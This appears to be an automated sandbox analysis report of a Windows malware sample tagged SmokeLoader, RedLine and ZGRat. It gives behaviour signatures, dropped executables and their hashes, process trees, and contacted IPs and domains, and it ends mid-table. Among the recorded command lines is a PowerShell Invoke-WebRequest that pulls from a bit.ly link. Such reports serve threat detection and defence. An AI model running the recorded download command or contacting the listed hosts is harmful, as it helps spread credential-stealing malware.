Analysis Overview
SHA256
816640f101b9440dc8892bf84720ac50afe8fe11888574fa8b81af8caae19aa7
Threat Level: Known bad
The file b6495a9c6a890740db6f41bf37af8427.exe was found to be: Known bad.
Malicious Activity Summary
Smokeloader family
RedLine payload
SmokeLoader
RedLine
ZGRat
Detect ZGRat V1
Downloads MZ/PE file
Reads user/profile data of web browsers
Deletes itself
Executes dropped EXE
Looks up external IP address via web service
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Unsigned PE
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-18 21:41
Signatures
Smokeloader family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-18 21:41
Reported
2023-12-18 21:43
Platform
win7-20231215-en
Max time kernel
32s
Max time network
34s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9F3C.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BCAC.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1224 wrote to memory of 2748 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9F3C.exe |
| PID 1224 wrote to memory of 2748 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9F3C.exe |
| PID 1224 wrote to memory of 2748 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9F3C.exe |
| PID 1224 wrote to memory of 2748 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9F3C.exe |
| PID 1224 wrote to memory of 1132 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BCAC.exe |
| PID 1224 wrote to memory of 1132 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BCAC.exe |
| PID 1224 wrote to memory of 1132 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BCAC.exe |
| PID 1224 wrote to memory of 1132 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BCAC.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe
"C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe"
C:\Users\Admin\AppData\Local\Temp\9F3C.exe
C:\Users\Admin\AppData\Local\Temp\9F3C.exe
C:\Users\Admin\AppData\Local\Temp\BCAC.exe
C:\Users\Admin\AppData\Local\Temp\BCAC.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\C42B.exe
C:\Users\Admin\AppData\Local\Temp\C42B.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| RU | 77.105.132.87:17066 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
Files
memory/2116-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1224-1-0x0000000002A70000-0x0000000002A86000-memory.dmp
memory/2116-2-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9F3C.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/2748-14-0x0000000000070000-0x00000000000C2000-memory.dmp
memory/2748-19-0x00000000746F0000-0x0000000074DDE000-memory.dmp
memory/2748-20-0x0000000004EE0000-0x0000000004F20000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BCAC.exe
| MD5 | 84b4c85403bffecab937304c9d573b48 |
| SHA1 | c48b9869a7e23404f03e4dc71a9b71bed6ab13af |
| SHA256 | ffea787728ca6bafb77b18594bfe874df805c831e8c8b75ac6f6f7c07006c779 |
| SHA512 | 1aac5b1dc41c6c11202e4c3d01e75c23b1b42840c58b5b2d06f97f120eccfac22ef4a094bb40b40eed8c760953c3f65062822044a839dc4e799c903ad778c450 |
C:\Users\Admin\AppData\Local\Temp\BCAC.exe
| MD5 | 737f53f4f92e09a7f0f34f148f183ce6 |
| SHA1 | d45ee97385e4e9b56280cece2e3e4b44c16365eb |
| SHA256 | 5c98f1f5db4552849ed6b57954b4e50b7a400c2b2b53aea88b8b6e5b8c0956d4 |
| SHA512 | 6852c2ffa85ddb84f533f93b6a90c23bf953d467ffceca727ec0efdc6925a4df6936f0701575b278529fc3cce68c6b36271e62b99fb2b75319155aa14f4ce13c |
memory/1132-28-0x0000000000C50000-0x0000000001A42000-memory.dmp
memory/1132-27-0x00000000746F0000-0x0000000074DDE000-memory.dmp
\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | c6c53c63657293e4da62c4e7f1d1831b |
| SHA1 | a8379d445fb2226da97418f4d75bad07ef9290ca |
| SHA256 | 900c0640ba1e682128403dd48d4865aa07f3a63086c7e19bc8baa0ca79bd6cdf |
| SHA512 | 9033f375fa453f04734b22837f08d50b7c01156fce8cfc1536921afc8014015753e48280d266d8e71a5bb3b0a79572cdb82b08c921149d797c7494418ff85965 |
\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
| SHA512 | 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56 |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | e0b201d9da0623b03d1de1b63457e7b0 |
| SHA1 | 60f1a5148b2f479efc51547e210a2ae583305b71 |
| SHA256 | 18b641a8d75f26adb52148ff99a69a790e061d130924f62c08ffcedbadf87571 |
| SHA512 | c118ec59658286d35f00e9f49ec21f1c5508c77ca7ada4d81e40b0ed221bfb4722bb18c1e95a72bdde95af8323bb70bd6bc9a6e3bfad37ce2f33fcd0a0b048ea |
\Users\Admin\AppData\Local\Temp\nsyC14D.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 34bef646227f2775362fe50d123475d1 |
| SHA1 | f78e12e38a411e26243207d800b61d32b8029fba |
| SHA256 | c3c0ec5c217be5a1fef4b292ff119f13458df9e4a5239e451e425ff7037f0854 |
| SHA512 | 19542be3baf6f83410c7373ee789cca059d4ad3087b40973264591edfe243ef63eec50b5beb50edf85b0e5c9854d502dcd0faeb6ca54533f9b2857f0553778d2 |
memory/1716-63-0x0000000000CB0000-0x0000000000DB0000-memory.dmp
memory/1716-65-0x0000000000220000-0x0000000000229000-memory.dmp
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | ef5c40551f24ee54634f28b4c8dc527f |
| SHA1 | 948264c50413b81a1cfdda208f6880614f74d050 |
| SHA256 | b32dd75ef77463c3b9b4c1a9598b51bbef486804a96cc2a1282ffb7f6c1a14b8 |
| SHA512 | c4369fd9c8b56e7a14374b5608baadc346eeac32b7192da95dbb6ec724a2bb45e2b362e5be65a0cca62ca6374d74ca271b7a5bad4366beb64370a18dc1b27522 |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2844-61-0x0000000002520000-0x0000000002918000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 0277dcbf0f270408ad6da03d0bc91b9a |
| SHA1 | 01fe1f3b96c9f4e64217c5437cfc0e0a73e234a7 |
| SHA256 | e19b0f1aa5c0f5ca4a97c996decb300e75a268c055715ae9e2fc6617a9441aaf |
| SHA512 | 7d089bda969c4d3a1c0f0939b9e1846e1e4e272897ee2c9399bfc92bf76d82afe471e3e61c744a0022fea04b60e803dc4a0a02b12f689899b773b8bd14540263 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-18 21:41
Reported
2023-12-18 21:43
Platform
win10v2004-20231215-en
Max time kernel
45s
Max time network
85s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
ZGRat
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E7B1.exe | N/A |
Reads user/profile data of web browsers
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3492 wrote to memory of 3756 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.exe |
| PID 3492 wrote to memory of 3756 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.exe |
| PID 3492 wrote to memory of 3756 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B882.exe |
| PID 3492 wrote to memory of 4324 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E7B1.exe |
| PID 3492 wrote to memory of 4324 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E7B1.exe |
| PID 3492 wrote to memory of 4324 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E7B1.exe |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe
"C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe"
C:\Users\Admin\AppData\Local\Temp\B882.exe
C:\Users\Admin\AppData\Local\Temp\B882.exe
C:\Users\Admin\AppData\Local\Temp\E7B1.exe
C:\Users\Admin\AppData\Local\Temp\E7B1.exe
C:\Users\Admin\AppData\Local\Temp\51E.exe
C:\Users\Admin\AppData\Local\Temp\51E.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\B39.exe
C:\Users\Admin\AppData\Local\Temp\B39.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c install.bat
C:\Users\Admin\AppData\Local\Temp\is-OUMNA.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OUMNA.tmp\tuc3.tmp" /SL5="$B0046,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\11C2.exe
C:\Users\Admin\AppData\Local\Temp\11C2.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 83.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 3.5.29.78:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 78.29.5.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| RU | 77.105.132.87:17066 | tcp | |
| US | 8.8.8.8:53 | 87.132.105.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| US | 8.8.8.8:53 | 125.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.237.62.212:80 | api.ipify.org | tcp |
Files
memory/2472-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/3492-1-0x00000000012B0000-0x00000000012C6000-memory.dmp
memory/2472-2-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B882.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/3756-12-0x0000000000960000-0x00000000009B2000-memory.dmp
memory/3756-17-0x0000000074430000-0x0000000074BE0000-memory.dmp
memory/3756-18-0x0000000005510000-0x0000000005AB4000-memory.dmp
memory/3756-19-0x0000000004F60000-0x0000000004FF2000-memory.dmp
memory/3756-20-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/3756-21-0x0000000005000000-0x000000000500A000-memory.dmp
memory/3756-23-0x0000000006570000-0x0000000006B88000-memory.dmp
memory/3756-24-0x0000000007DF0000-0x0000000007EFA000-memory.dmp
memory/3756-25-0x0000000006430000-0x0000000006442000-memory.dmp
memory/3756-26-0x0000000006490000-0x00000000064CC000-memory.dmp
memory/3756-27-0x00000000064E0000-0x000000000652C000-memory.dmp
memory/3756-28-0x0000000008A00000-0x0000000008A66000-memory.dmp
memory/3756-29-0x0000000008E80000-0x0000000009042000-memory.dmp
memory/3756-30-0x0000000009580000-0x0000000009AAC000-memory.dmp
memory/3756-31-0x0000000009350000-0x00000000093A0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\E7B1.exe
| MD5 | 8c398916da35973575f7d1fdf63c19aa |
| SHA1 | 0641014a47b569501ae6e65529be01f80e688372 |
| SHA256 | 3c8f22c1e1207b518e7791dc127e870f77a16a1f24368207c1e35317aeaaba51 |
| SHA512 | c61d30da6fd8ab32e318d46498e5f323a0c7ec28571823ee73f7e1a616d76d61bd596d54eb2d827fa7013f42098498a5f50a0dbd82e4a82c987c56605903bd61 |
C:\Users\Admin\AppData\Local\Temp\E7B1.exe
| MD5 | 392e6b16fd27eea926bdc519dd60039f |
| SHA1 | c84a63d916a7a32cf730948cfc343f0f7164feac |
| SHA256 | 8903f680d8a7235392f30dc0431afddab1079022998f59d32e25bf53de0017f9 |
| SHA512 | 52aba1d3a9b0fd9757a63dcaa33bad4f8d522f915760cc298301830362f01fe7d1a1e93de5d268e2ee9e5bfeaf18ab413a628022f0144a26ee60524b1a5be39b |
memory/4324-36-0x0000000000490000-0x000000000092E000-memory.dmp
memory/4324-37-0x0000000074430000-0x0000000074BE0000-memory.dmp
memory/4324-38-0x0000000005440000-0x00000000054DC000-memory.dmp
memory/3756-39-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/4324-40-0x00000000051B0000-0x00000000051C0000-memory.dmp
memory/3756-41-0x0000000074430000-0x0000000074BE0000-memory.dmp
memory/3756-44-0x0000000074430000-0x0000000074BE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\51E.exe
| MD5 | 20001f7ce3121bb0568d0cfccae0bf29 |
| SHA1 | 3e356cec23414ca8e3486061c082144abcb289ea |
| SHA256 | e73b88a9d1498de5bbbfb51eb38b2a5e7ad3feb6e91eca26736a1231a06c00a3 |
| SHA512 | ea1c75ab95f65e1161412806c03a10e2b6077cc4c021d374c3acdac6ed49234a1343fdc89b8933de4055d993115ca05c11528afde100def466b9a15f8f24c8ab |
C:\Users\Admin\AppData\Local\Temp\51E.exe
| MD5 | cdc204df6178375cbae23944694f7344 |
| SHA1 | e1a8a6af97555a6650c9938ddaa6c4b4600b1c56 |
| SHA256 | 82e86d18e1661b00257323a70342c10419d17b0cfcb9487839fa01b22efb4696 |
| SHA512 | af0a71a252878d8abf11572b36ff6b4f10133f0b71541052e24fa49e5d97a7775097cd1288eb95b685b11d250465499bb8d3996a84bd38471650f4a86c6d3b44 |
memory/2468-49-0x0000000074430000-0x0000000074BE0000-memory.dmp
memory/2468-50-0x00000000000E0000-0x0000000000ED2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 5d435f239104f6f4b8aca494cd0f7b2c |
| SHA1 | a47880df254ca60a6f86a42d05092822ab43901c |
| SHA256 | c65861276001677cf4f352b2774e4699991badb4c021a7f5ffef6cb6aa8d1b02 |
| SHA512 | 29f9c693cfb7ae4372092657e3c7aa3b539ccee1fdffa8d4980318542d5682c53aa245d2fb8f2373b911121aa06993197c35bde98da82005365ce68b0696675d |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 55d93c3181333967be8c57f52c1d8a49 |
| SHA1 | f61045bb727f119c84a618e8d19a1fbc9b63a046 |
| SHA256 | 2d95ca85f881a9388f852a9243fd4a348359516d1aada5dd198c27d5146653e1 |
| SHA512 | 486da6f2eb92e0c408786af64cedd1c054fad29234e9afcd40fa384fdb7fc41ebc9e583e1713a0cf8eb50a67cc2291eff7fd235948b34915087f843eaefa17de |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 56884a24495c3709f6348829212ca5d3 |
| SHA1 | c3a0cf0dbae97755bcb7aa6de47dee8438b217ee |
| SHA256 | 9781722258e5fc13f63481f7bf25ecdff3a961e44b9f405191528045395fd368 |
| SHA512 | 063a91888ffd0f121977250f91b195f257750f19e5e81629f53f111df9eaba719143c781e5dacb843b6b4e8087e68e4f72952f46033a4cb7c4a3319f2730306c |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 507f2fbbe42ccef8e74e66a6c1400c93 |
| SHA1 | d6a5a1ac5f7679153489cc54ddfaf2a98c4c30c6 |
